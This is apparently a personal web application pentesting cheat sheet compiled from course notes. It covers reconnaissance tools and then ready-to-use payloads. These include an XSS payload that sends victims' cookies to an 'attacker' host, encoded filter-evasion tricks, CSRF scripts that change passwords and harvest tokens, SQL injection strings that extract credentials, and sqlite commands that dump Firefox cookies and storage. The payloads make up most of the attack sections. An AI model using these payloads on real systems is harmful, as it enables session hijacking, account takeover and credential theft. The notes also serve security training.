|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     
         |/                

Last changed: 14.05.2017

Hacking web applications


As web application pentesting represents a large topic on its own I will regard it on a separate page. This paged represents some of the notes taken during the online courses eLearnSecurity Web Application Penetration Testing (eWAPT) and eLearnSecurity Web Application Penetration Testing extreme (eWAPTX).

information gathering


To identify possible attack vectors for a certain target you should start by determining the target scope and fingerprinting the underlying server technologies.

webserver fingerprinting

httprint (GUI tool)
http://toolbar.netcraft.com/site_report?url=target.com

cms scanning

wpscan -u wordpress.target.com
joomscan -u joomla.target.com

website mapping

burpsuite => spider
dirb http://target.com
dirbuster (GUI tool)

identify WAF

wafw00f http://target.com

vulnerability scanner

nikto -host http://target.com
w3af (GUI tool)

cross site scripting


Missing input sanitization can allow an attacker to inject javascript into a webpage. This javascript code is then executed by the browser of a victim. A comprehensive ressource for filter evasion tricks can be found in the OWASP XSS Filter Evasion Cheat Sheet.

steal cookie

<svg/onload='var i=new Image;i.src="http://attacker/"+document.cookie;'>

submit form

<script>window.onload=function() 
{var f=document.getElementById("form"); var e=f.elements; 
e[0].value="newPassword";f.submit()};</script>

filter evasion

eval(String.fromCharCode(97,108,101,114,116)+"('xss')")
eval(/ale/.source+/rt/.source+/('xss')/.source)

base36 encoding

parseInt("alert",36)
eval(17795081..toString(36))(43804..toString(36))

base64 encoding

eval(btoa("alert('xss')"))
eval(atob(`YWxlcnQoJ3hzcycp`))
<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K\'>

cross site request forgery


form post with csrf

<script>
var change_request = new XMLHttpRequest();
var url = "http://target/changePassword.php";
var params = "password=newPassword&submit=";

change_request.open("POST", url, true);
change_request.withCredentials = 'true';
change_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
change_request.onreadystatechange = function(){
    if(change_request.readystate > 1){
        change_request.abort();
    }
}
change_request.send(params);
</script>

read csrf token via xss

<script>
var token_request = new XMLHttpRequest();
token_request.onreadystatechange = function (){
    if(token_request.readyState == 4){
        var htmlSource = token_request.responseText;
        var parser = new DOMParser().parseFromString(htmlSource, "text/html");
        var token = parser.getElementById("CSRFToken").value;
        changePass(token);
    }
}
token_request.open("GET", "http://target/editProfile.php", true);
token_request.withCredentials = 'true';
token_request.send();
</script>

sql injection


Missing input validation can also lead to sql injection vulnerabilities. As exact design of the exploit depends on the crafted query I will only mention examples for some common techniques. A great page for further ressources is OWASP.

error based sql injection (mssql)

p=999 or 1 in (select top 1 cast(name as varchar(4096))from database..sysobjects where xtype="U")--
p=999 or 1 in (select top 1 cast(database..syscolumns.name as varchar(4096))from database..syscolumns,database..sysobjects where database..syscolumns.id=database..sysobjects.id and database..sysobjects.name="tableXY")--
p=999 or 1 in (select top 1 cast(username as varchar(4096))%2bchar(64)%2bpassword from users where id=1)--

blind sql injection (mysql)

' OR 'a'='a
' OR 'a'='b
' OR ASCII(SUBSTRING(user(),1,1)) <=109 #
' OR SUBSTRING(user(),1,1) = 'a' #

time based sql injection (mssql)

if (select user) = 'sa' waitfor delay '0:0:5'

time based sql injection (mssql)

IF EXISTS (SELECT * FROM users WHERE username = 'admin') SLEEP(5)

browser data


get bookmarks

sqlite3 .mozilla/firefox/<profile>.default/places.sqlite "select url from moz_places"

get cookies

sqlite3 .mozilla/firefox/<profile>.default/cookies.sqlite "select basedomain, name, value from moz_cookies"

list web storage

sqlite3 .mozilla/firefox/nrh8j1uj.default/webappsstore.sqlite "select originKey, key, value from webappsstore2"